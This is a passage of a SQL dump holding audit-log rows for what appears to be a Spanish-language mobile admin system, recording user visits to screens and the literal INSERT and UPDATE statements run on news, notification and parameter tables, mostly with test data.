23:34:00\', REMITENTE = \'ADMIN\', SEGMENTO_ID = 1 WHERE ID = 1', '2021-08-16 20:32:32', ''), (11, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-16 20:32:50', ''), (12, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-16 20:33:08', ''), (13, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-16 20:45:12', ''), (14, 75, 128, 'MODIFICO', 'UPDATE TBL_MOVIL_NOTICIAS SET TITULO = \'NUEVA\', SUBTITULO = \'SEGUNDO PARCIAL\', DESCRIPCION = \'HOLA RICCY\', FECHA = \'2021-08-17 21:32:00\',FECHA_VENCIMIENTO = \'2021-09-18 23:34:00\', REMITENTE = \'ADMIN\', SEGMENTO_ID = 1 WHERE ID = 1', '2021-08-16 20:45:43', ''), (15, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-16 20:45:43', ''), (16, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-16 20:45:46', ''), (17, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-16 20:46:12', ''), (18, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-16 20:49:38', ''), (19, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-16 20:49:45', ''), (20, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-16 20:49:46', ''), (21, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-16 20:49:50', ''), (22, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-16 20:55:24', ''), (23, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-16 20:55:28', ''), (24, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-16 20:55:35', ''), (25, 75, 128, 'MODIFICO', 'UPDATE TBL_MOVIL_NOTICIAS SET TITULO = \'NUEVA\', SUBTITULO = \'SEGUNDO PARCIAL\', DESCRIPCION = \'HOLA RICCY\', FECHA = \'2021-08-17 21:32:00\',FECHA_VENCIMIENTO = \'2021-09-18 23:34:00\', REMITENTE = \'ADMIN\', SEGMENTO_ID = 1 WHERE ID = 1', '2021-08-16 20:55:45', ''), (26, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-16 20:55:46', ''), (27, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-16 20:55:49', ''), (28, 75, 128, 'INGRESO', 'A BITÁCORA DEL SISTEMA MÓVIL', '2021-08-16 20:56:46', ''), (29, 75, 128, 'INGRESO', 'A CREAR NOTIFICACIÓN', '2021-08-16 21:02:30', ''), (30, 75, 12, 'INGRESO', 'A GESTIÓN DE PARAMETROS ', '2021-08-17 11:01:34', ''), (31, 75, 16, 'INGRESO', 'A GESTIÓN DE SEGMENTOS ', '2021-08-17 11:01:45', ''), (32, 75, 2, 'INGRESO', 'MANTENIMIENTO TIPO NOTIFICACIÓN', '2021-08-17 11:01:55', ''), (33, 75, 128, 'INGRESO', 'MANTENIMIENTO TIPO MENSAJE', '2021-08-17 11:02:09', ''), (34, 75, 128, 'INGRESO', 'MANTENIMIENTO TIPO MENSAJE', '2021-08-17 11:04:13', ''), (35, 75, 2, 'INGRESO', 'MANTENIMIENTO TIPO NOTIFICACIÓN', '2021-08-17 11:04:31', ''), (36, 75, 2, 'INGRESO', 'MANTENIMIENTO TIPO NOTIFICACIÓN', '2021-08-17 11:05:20', ''), (37, 75, 2, 'INGRESO', 'MANTENIMIENTO TIPO NOTIFICACIÓN', '2021-08-17 11:07:24', ''), (38, 75, 2, 'INGRESO', 'MANTENIMIENTO TIPO NOTIFICACIÓN', '2021-08-17 11:08:22', ''), (39, 75, 2, 'INGRESO', 'MANTENIMIENTO TIPO NOTIFICACIÓN', '2021-08-17 11:08:52', ''), (40, 75, 2, 'INGRESO', 'MANTENIMIENTO TIPO NOTIFICACIÓN', '2021-08-17 11:09:21', ''), (41, 75, 2, 'INGRESO', 'MANTENIMIENTO TIPO NOTIFICACIÓN', '2021-08-17 11:11:57', ''), (42, 75, 127, 'INGRESO', 'MANTENIMIENTO TIPO RECURSO ', '2021-08-17 11:12:01', ''), (43, 75, 128, 'INGRESO', 'MANTENIMIENTO TIPO MENSAJE', '2021-08-17 11:12:12', ''), (44, 75, 12, 'INGRESO', 'A GESTIÓN DE PARAMETROS ', '2021-08-17 21:00:56', ''), (45, 75, 11, 'INGRESO', 'A CREAR PARÁMETROS', '2021-08-17 21:01:00', ''), (46, 75, 12, 'INSERTO', 'INSERT INTO TBL_MOVIL_PARAMETROS (PARAMETRO,DESCRIPCION,VALOR,FECHA_MODIFICACION,CREADO_POR) VALUES (\'NUEVO PARAMETRO\', \'CATEGORIA NUEVA\', \'42\',SYSDATE(),\'IROMERO\')', '2021-08-17 21:01:17', ''), (47, 75, 12, 'INSERTO', 'INSERT INTO TBL_MOVIL_PARAMETROS (PARAMETRO,DESCRIPCION,VALOR,FECHA_MODIFICACION,CREADO_POR,MODIFICADO_POR) VALUES (\'NUEVO PARAMETRO\', \'CATEGORIA NUEVA\', \'42\',SYSDATE(),\'IROMERO\',NULL)', '2021-08-17 21:06:43', ''), (48, 75, 12, 'INGRESO', 'A GESTIÓN DE PARAMETROS ', '2021-08-17 21:06:43', ''), (49, 75, 12, 'INGRESO', 'A GESTIÓN DE PARAMETROS ', '2021-08-17 21:06:48', ''), (50, 75, 12, 'INGRESO', 'A GESTIÓN DE PARAMETROS ', '2021-08-17 21:07:14', ''), (51, 75, 12, 'INGRESO', 'A GESTIÓN DE PARAMETROS ', '2021-08-17 21:08:36', ''), (52, 75, 11, 'INGRESO', 'A CREAR PARÁMETROS', '2021-08-17 21:08:38', ''), (53, 75, 12, 'INSERTO', 'INSERT INTO TBL_MOVIL_PARAMETROS (PARAMETRO,DESCRIPCION,VALOR,FECHA_MODIFICACION,CREADO_POR,MODIFICADO_POR) VALUES (\'PRUEBAS\', \'CATEGORIANUEVA\', \'42\',SYSDATE(),\'IROMERO\',1)', '2021-08-17 21:08:43', ''), (54, 75, 12, 'INGRESO', 'A GESTIÓN DE PARAMETROS ', '2021-08-17 21:08:43', ''), (55, 75, 12, 'INGRESO', 'A GESTIÓN DE PARAMETROS ', '2021-08-17 21:08:47', ''), (56, 75, 12, 'INGRESO', 'A GESTIÓN DE PARAMETROS ', '2021-08-17 21:23:40', ''), (57, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 21:23:49', ''), (58, 75, 128, 'INGRESO', 'A CREAR NOTIFICACIÓN', '2021-08-17 21:23:52', ''), (59, 75, 128, 'INGRESO', 'A CREAR NOTIFICACIÓN', '2021-08-17 21:26:15', ''), (60, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 21:26:16', ''), (61, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 21:26:24', ''), (62, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 22:20:42', ''), (63, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 22:22:50', ''), (64, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 22:23:44', ''), (65, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 22:23:56', ''), (66, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 22:25:49', ''), (67, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 22:29:13', ''), (68, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 22:29:31', ''), (69, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 22:31:17', ''), (70, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 22:31:31', ''), (71, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 22:40:07', ''), (72, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 22:41:42', ''), (73, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 22:43:42', ''), (74, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 22:44:19', ''), (75, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 22:45:11', ''), (76, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 22:45:18', ''), (77, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 22:45:29', ''), (78, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 22:45:48', ''), (79, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 22:47:30', ''), (80, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 22:48:11', ''), (81, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 22:49:05', ''), (82, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 22:51:09', ''), (83, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 22:51:27', ''), (84, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 22:51:48', ''), (85, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 22:52:04', ''), (86, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 23:08:05', ''), (87, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 23:08:27', ''), (88, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 23:11:18', ''), (89, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 23:11:28', ''), (90, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 23:20:03', ''), (91, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 23:20:53', ''), (92, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 23:21:04', ''), (93, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 23:22:43', ''), (94, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 23:22:52', ''), (95, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 23:23:40', ''), (96, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 23:23:56', ''), (97, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 23:24:35', ''), (98, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 23:24:43', ''), (99, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 23:25:05', ''), (100, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 23:25:20', ''), (101, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 23:26:21', ''), (102, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 23:27:40', ''), (103, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 23:32:42', ''), (104, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 23:34:48', ''), (105, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 23:36:52', ''), (106, 75, 127, 'MODIFICO', 'UPDATE TBL_MOVIL_NOTIFICACIONES SET TITULO = \'PRUEBA NOTIFICACION\', DESCRIPCION = \'NUEVA NOTIFICACION\', FECHA = \'2021-08-18 05:24:00\', REMITENTE = \'ADMIN\', SEGMENTO_ID = 1, TIPO_NOTIFICACION_ID = 1, IMAGE_URL = WHERE ID = 1', '2021-08-17 23:37:09', ''), (107, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 23:38:57', ''), (108, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 23:39:00', ''), (109, 75, 127, 'MODIFICO', 'UPDATE TBL_MOVIL_NOTIFICACIONES SET TITULO = \'PRUEBA NOTIFICACION\', DESCRIPCION = \'NUEVA NOTIFICACION\', FECHA = \'2021-08-18 05:24:00\', REMITENTE = \'ADMIN\', SEGMENTO_ID = 1, TIPO_NOTIFICACION_ID = 1, IMAGE_URL = HTTPS://APIAPPINFOMATICA.000WEBHOSTAPP.COM/A', '2021-08-17 23:39:20', ''), (110, 75, 127, 'MODIFICO', 'UPDATE TBL_MOVIL_NOTIFICACIONES SET TITULO = \'PRUEBA NOTIFICACION\', DESCRIPCION = \'NUEVA NOTIFICACION\', FECHA = \'2021-08-18 05:24:00\', REMITENTE = \'ADMIN\', SEGMENTO_ID = 1, TIPO_NOTIFICACION_ID = 1, IMAGE_URL = HTTPS://APIAPPINFOMATICA.000WEBHOSTAPP.COM/A', '2021-08-17 23:39:57', ''), (111, 75, 127, 'MODIFICO', 'UPDATE TBL_MOVIL_NOTIFICACIONES SET TITULO = \'PRUEBA NOTIFICACION\', DESCRIPCION = \'NUEVA NOTIFICACION\', FECHA = \'2021-08-18 05:24:00\', REMITENTE = \'ADMIN\', SEGMENTO_ID = 1, TIPO_NOTIFICACION_ID = 1, IMAGE_URL = HTTPS://APIAPPINFOMATICA.000WEBHOSTAPP.COM/A', '2021-08-17 23:41:20', ''), (112, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 23:42:37', ''), (113, 75, 127, 'MODIFICO', 'UPDATE TBL_MOVIL_NOTIFICACIONES SET TITULO = \'PRUEBA NOTIFICACION\', DESCRIPCION = \'NUEVA NOTIFICACION\', FECHA = \'2021-08-18 05:24:00\', REMITENTE = \'ADMIN\', SEGMENTO_ID = 1, TIPO_NOTIFICACION_ID = 1, IMAGE_URL = WHERE ID = 1', '2021-08-17 23:42:41', ''), (114, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-17 23:45:38', ''), (115, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:08:01', ''), (116, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:08:09', ''), (117, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:08:20', ''), (118, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:08:46', ''), (119, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:09:05', ''), (120, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:09:11', ''), (121, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:13:01', ''), (122, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:13:07', ''), (123, 75, 127, 'MODIFICO', 'INSERT INTO TBL_MOVIL_TRANSACCIONES VALUES (NULL,SYSDATE(),\'ENVIO DE NOTIFICACIONES\',\'NO SE ENCONTRARON DATOS\',\'COMPLETADA\')', '2021-08-18 00:13:18', ''), (124, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:13:18', ''), (125, 75, 14, 'INGRESO', 'GESTION DE TRANSACCIONES', '2021-08-18 00:13:36', ''), (126, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:15:02', ''), (127, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:15:11', ''), (128, 75, 127, 'MODIFICO', 'INSERT INTO TBL_MOVIL_TRANSACCIONES VALUES (NULL,SYSDATE(),\'ENVIO DE NOTIFICACIONES\',\'NO SE ENCONTRARON DATOS\',\'COMPLETADA\')', '2021-08-18 00:16:44', ''), (129, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:16:44', ''), (130, 75, 14, 'INGRESO', 'GESTION DE TRANSACCIONES', '2021-08-18 00:17:01', ''), (131, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:17:11', ''), (132, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:17:19', ''), (133, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:18:39', ''), (134, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:19:10', ''), (135, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:19:45', ''), (136, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:19:58', ''), (137, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:34:50', ''), (138, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:35:45', ''), (139, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:36:30', ''), (140, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:37:00', ''), (141, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:37:32', ''), (142, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:37:46', ''), (143, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:39:11', ''), (144, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:39:32', ''), (145, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:40:03', ''), (146, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:40:33', ''), (147, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:42:23', ''), (148, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:42:29', ''), (149, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:43:03', ''), (150, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 00:44:31', ''), (151, 75, 161, 'INGRESO', 'A LA VISTA DEL CHAT ', '2021-08-18 16:12:25', ''), (152, 75, 161, 'INGRESO', 'A LA VISTA DEL CHAT ', '2021-08-18 16:12:43', ''), (153, 75, 161, 'INGRESO', 'A LA VISTA DEL CHAT ', '2021-08-18 16:17:05', ''), (154, 75, 161, 'INGRESO', 'A LA VISTA DEL CHAT ', '2021-08-18 16:18:03', ''), (155, 75, 161, 'INGRESO', 'A LA VISTA DEL CHAT ', '2021-08-18 16:19:30', ''), (156, 75, 161, 'INGRESO', 'A LA VISTA DEL CHAT ', '2021-08-18 16:19:52', ''), (157, 75, 161, 'INGRESO', 'A LA VISTA DEL CHAT ', '2021-08-18 16:22:07', ''), (158, 75, 161, 'INGRESO', 'A LA VISTA DEL CHAT ', '2021-08-18 16:22:38', ''), (159, 75, 161, 'INGRESO', 'A LA VISTA DEL CHAT ', '2021-08-18 16:23:00', ''), (160, 75, 161, 'INGRESO', 'A LA VISTA DEL CHAT ', '2021-08-18 16:24:32', ''), (161, 75, 161, 'INGRESO', 'A LA VISTA DEL CHAT ', '2021-08-18 16:24:58', ''), (162, 75, 160, 'INGRESO', 'A BITÁCORA DEL SISTEMA MÓVIL', '2021-08-18 16:25:41', ''), (163, 75, 160, 'INGRESO', 'A BITÁCORA DEL SISTEMA MÓVIL', '2021-08-18 16:29:56', ''), (164, 75, 181, 'INGRESO', 'A MENU NOTIFICACIONES', '2021-08-18 16:36:35', ''), (165, 75, 181, 'INGRESO', 'A MENU NOTIFICACIONES', '2021-08-18 16:36:38', ''), (166, 75, 169, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-18 16:36:42', ''), (167, 75, 180, 'INGRESO', 'A MENU NOTICIAS', '2021-08-18 16:36:47', ''), (168, 75, 161, 'INGRESO', 'A LA VISTA DEL CHAT ', '2021-08-18 16:36:49', ''), (169, 75, 160, 'INGRESO', 'A BITÁCORA DEL SISTEMA MÓVIL', '2021-08-18 16:36:52', ''), (170, 75, 179, 'INGRESO', 'A MENU MANTENIMIENTO ', '2021-08-18 16:37:00', ''), (171, 75, 175, 'INGRESO', 'MANTENIMIENTO TIPO NOTIFICACIÓN', '2021-08-18 16:37:02', ''), (172, 75, 179, 'INGRESO', 'A MENU MANTENIMIENTO ', '2021-08-18 16:37:05', ''), (173, 75, 174, 'INGRESO', 'MANTENIMIENTO TIPO MENSAJE', '2021-08-18 16:37:09', ''), (174, 75, 166, 'INGRESO', 'A CREAR TIPO MENSAJE', '2021-08-18 16:37:14', ''), (175, 75, 128, 'INSERTO', 'INSERT into tbl_movil_tipo_mensajes (id,tipo_mensaje) VALUES (null,\'MENSAJE\')', '2021-08-18 16:37:19', ''), (176, 75, 174, 'INGRESO', 'MANTENIMIENTO TIPO MENSAJE', '2021-08-18 16:37:19', ''), (177, 75, 174, 'INGRESO', 'MANTENIMIENTO TIPO MENSAJE', '2021-08-18 16:37:23', ''), (178, 75, 179, 'INGRESO', 'A MENU MANTENIMIENTO ', '2021-08-18 16:37:26', ''), (179, 75, 176, 'INGRESO', 'MANTENIMIENTO TIPO RECURSO ', '2021-08-18 16:37:27', ''), (180, 75, 176, 'INGRESO', 'MANTENIMIENTO TIPO RECURSO ', '2021-08-18 16:37:39', ''), (181, 75, 178, 'INGRESO', 'A MENU GESTION', '2021-08-18 16:38:56', ''), (182, 75, 172, 'INGRESO', 'GESTION DE TRANSACCIONES', '2021-08-18 16:38:58', ''), (183, 1, 181, 'INGRESO', 'A MENU NOTIFICACIONES', '2021-08-22 01:10:48', ''), (184, 1, 169, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-22 01:10:50', ''), (185, 1, 169, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-22 01:24:03', ''), (186, 1, 163, 'INGRESO', 'A CREAR NOTIFICACIÓN', '2021-08-22 01:24:10', ''), (187, 1, 163, 'INGRESO', 'A CREAR NOTIFICACIÓN', '2021-08-22 01:36:49', ''), (188, 1, 169, 'INSERTO', 'INSERT INTO TBL_MOVIL_NOTIFICACIONES VALUES (NULL,\'PRUEBAS INFORMATICAS\',\'PRUEBAS\',\'2021-08-22 02:40:00\',\'ADMIN\',1,1,\'\')', '2021-08-22 01:41:03', ''), (189, 1, 169, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-22 01:41:04', ''), (190, 1, 180, 'INGRESO', 'A MENU NOTICIAS', '2021-08-22 01:41:15', ''), (191, 1, 162, 'INGRESO', 'A CREAR NOTICIA', '2021-08-22 01:41:17', ''), (192, 1, 168, 'INSERTO', 'INSERT INTO TBL_MOVIL_NOTICIAS (TITULO,SUBTITULO,DESCRIPCION,FECHA,FECHA_VENCIMIENTO,REMITENTE,SEGMENTO_ID) VALUES (\'PRUEBAS INFORMATICAS\',\'SEGUNDO PARCIAL\',\'HOLA MUNDO AJAS\',\'2021-08-23 02:44:00\',\'2021-09-23 01:43:00\',\'ADMIN\',1)', '2021-08-22 01:44:01', ''), (193, 1, 168, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-22 01:44:02', ''), (194, 1, 168, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-22 01:44:11', ''), (195, 1, 168, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-22 01:56:45', ''), (196, 1, 168, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-22 01:56:50', ''), (197, 1, 168, 'MODIFICO', 'UPDATE TBL_MOVIL_NOTICIAS SET TITULO = \'PRUEBAS INFORMATICAS\', SUBTITULO = \'SEGUNDO PARCIAL\', DESCRIPCION = \'HOLA MUNDO AJAS\', FECHA = \'2021-08-23 02:44:00\',FECHA_VENCIMIENTO = \'2021-09-23 01:43:00\', REMITENTE = \'ADMIN\', SEGMENTO_ID = 1 WHERE ID = 2', '2021-08-22 01:56:53', ''), (198, 1, 168, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-22 01:56:53', ''), (199, 1, 168, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-22 01:59:13', ''), (200, 1, 168, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-22 01:59:16', ''), (201, 1, 168, 'MODIFICO', 'UPDATE TBL_MOVIL_NOTICIAS SET TITULO = \'PRUEBAS INFORMATICAS\', SUBTITULO = \'SEGUNDO PARCIAL\', DESCRIPCION = \'HOLA MUNDO AJAS\', FECHA = \'2021-08-23 02:44:00\',FECHA_VENCIMIENTO = \'2021-09-23 01:43:00\', REMITENTE = \'ADMIN\', SEGMENTO_ID = 1 WHERE ID = 2', '2021-08-22 01:59:21', ''), (202, 1, 168, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-22 01:59:22', ''), (203, 1, 168, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-22 01:59:24', ''), (204, 1, 168, 'MODIFICO', 'UPDATE TBL_MOVIL_NOTICIAS SET TITULO = \'PRUEBAS INFORMATICAS\', SUBTITULO = \'SEGUNDO PARCIAL\', DESCRIPCION = \'HOLA MUND\', FECHA = \'2021-08-23 02:44:00\',FECHA_VENCIMIENTO = \'2021-09-23 01:43:00\', REMITENTE = \'ADMIN\', SEGMENTO_ID = 1 WHERE ID = 2', '2021-08-22 01:59:31', ''), (205, 1, 168, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-22 01:59:32', ''), (206, 1, 168, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-22 01:59:35', ''), (207, 1, 168, 'MODIFICO', 'UPDATE TBL_MOVIL_NOTICIAS SET TITULO = \'PRUBEAS\', SUBTITULO = \'HOLA\', DESCRIPCION = \'HOLA MUND\', FECHA = \'2021-08-23 02:44:00\',FECHA_VENCIMIENTO = \'2021-09-23 01:43:00\', REMITENTE = \'ADMIN\', SEGMENTO_ID = 1 WHERE ID = 2', '2021-08-22 01:59:45', ''), (208, 1, 168, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-22 01:59:45', ''), (209, 1, 181, 'INGRESO', 'A MENU NOTIFICACIONES', '2021-08-22 01:59:51', ''), (210, 1, 169, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-22 01:59:52', ''), (211, 1, 169, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-22 02:02:47', ''), (212, 1, 179, 'INGRESO', 'A MENU MANTENIMIENTO ', '2021-08-22 11:33:50', ''), (213, 1, 176, 'INGRESO', 'MANTENIMIENTO TIPO RECURSO ', '2021-08-22 11:34:03', ''), (214, 1, 176, 'INGRESO', 'MANTENIMIENTO TIPO RECURSO ', '2021-08-22 11:38:12', ''), (215, 1, 181, 'INGRESO', 'A MENU NOTIFICACIONES', '2021-08-22 11:38:18', ''), (216, 1, 169, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-22 11:38:20', ''), (217, 1, 169, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-22 11:43:07', ''), (218, 1, 169, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-22 11:45:36', ''), (219, 1, 169, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-22 11:46:05', ''), (220, 1, 169, 'INGRESO', 'A GESTIÓN DE NOTIFICACIONES ', '2021-08-22 11:47:09', ''), (221, 1, 181, 'INGRESO', 'A MENU NOTIFICACIONES', '2021-08-22 12:13:45', ''), (222, 1, 180, 'INGRESO', 'A MENU NOTICIAS', '2021-08-22 12:13:49', ''), (223, 1, 168, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-22 12:13:51', ''), (224, 1, 161, 'INGRESO', 'A LA VISTA DEL CHAT ', '2021-08-22 12:13:56', ''), (225, 1, 161, 'INGRESO', 'A LA VISTA DEL CHAT ', '2021-08-22 12:16:58', ''), (226, 75, 161, 'INGRESO', 'A LA VISTA DEL CHAT ', '2021-08-22 12:17:12', ''), (227, 75, 161, 'INGRESO', 'A LA VISTA DEL CHAT ', '2021-08-22 12:18:20', ''), (228, 75, 160, 'INGRESO', 'A BITÁCORA DEL SISTEMA MÓVIL', '2021-08-22 12:18:33', ''), (229, 75, 160, 'INGRESO', 'A BITÁCORA DEL SISTEMA MÓVIL', '2021-08-22 12:19:19', ''), (230, 75, 160, 'INGRESO', 'A BITÁCORA DEL SISTEMA MÓVIL', '2021-08-22 12:19:48', ''), (231, 